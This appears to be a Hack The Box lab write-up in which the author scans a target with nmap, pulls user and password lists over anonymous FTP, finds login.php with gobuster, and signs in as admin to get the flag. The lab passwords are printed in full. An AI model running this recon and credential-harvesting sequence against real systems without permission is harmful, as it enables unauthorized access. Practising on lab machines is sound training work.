в”Њв”Ђв”Ђ(kaliг‰їkali)-[~/htb]
в””в”Ђ$ nmap -sV 10.129.*.*            
Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-09 09:29 EDT
Nmap scan report for 10.129.*.*
Host is up (0.051s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Unix

So the server is running a webapp, with 2 opened ports,21 and 80. I know its allows anonymous login, so:
в”Њв”Ђв”Ђ(kaliг‰їkali)-[~/htb]
в””в”Ђ$ ftp 10.129.*.*
Connected to 10.129.*.*.
220 (vsFTPd 3.0.3)
Name (10.129.*.*:kali): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||45081|)
150 Here comes the directory listing.
-rw-r--r--    1 ftp      ftp            33 Jun 08  2021 allowed.userlist
-rw-r--r--    1 ftp      ftp            62 Apr 20  2021 allowed.userlist.passwd
226 Directory send OK.

Lets get this 2 files...
ftp> get allowed.userlist
local: allowed.userlist remote: allowed.userlist
229 Entering Extended Passive Mode (|||47030|)
150 Opening BINARY mode data connection for allowed.userlist (33 bytes).
100% |**************************************************************************************************************|    33       16.06 KiB/s    00:00 ETA
226 Transfer complete.
33 bytes received in 00:00 (0.61 KiB/s)
ftp> 
ftp> get allowed.userlist.passwd
local: allowed.userlist.passwd remote: allowed.userlist.passwd
229 Entering Extended Passive Mode (|||41808|)
150 Opening BINARY mode data connection for allowed.userlist.passwd (62 bytes).
100% |**************************************************************************************************************|    62      786.32 KiB/s    00:00 ETA
226 Transfer complete.
62 bytes received in 00:00 (0.83 KiB/s)

lets check them:
в”Њв”Ђв”Ђ(kaliг‰їkali)-[~/htb]
в””в”Ђ$ cat allowed.userlist
aron
pwnmeow
egotisticalsw
admin
                                                                                                                                                           
в”Њв”Ђв”Ђ(kaliг‰їkali)-[~/htb]
в””в”Ђ$ cat allowed.userlist.passwd 
root
Supersecretpassword1
@BaASD&9032123sADS
rKXM59ESxesUFHAd


now, since its a web application, we have to login somehow...On the webpage (in browser) there isn't any login pages...so lets bruteforce it:
в”Ђв”Ђ(kaliг‰їkali)-[~/htb]
в””в”Ђ$ gobuster dir -u http://10.129.*.* -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php        
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.129.*.*
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/login.php            (Status: 200) [Size: 1577]
/assets               (Status: 301) [Size: 313] [--> http://10.129.*.*/assets/]
/css                  (Status: 301) [Size: 310] [--> http://10.129.*.*/css/]
/js                   (Status: 301) [Size: 309] [--> http://10.129.*.*/js/]
/logout.php           (Status: 302) [Size: 0] [--> login.php]
/config.php           (Status: 200) [Size: 0]
/fonts                (Status: 301) [Size: 312] [--> http://10.129.*.*/fonts/]
/dashboard            (Status: 301) [Size: 316] [--> http://10.129.*.*/dashboard/]

There is is...login.php. So open it in a browser, and login with: admin/rKXM59ESxesUFHAd and there is the flag...

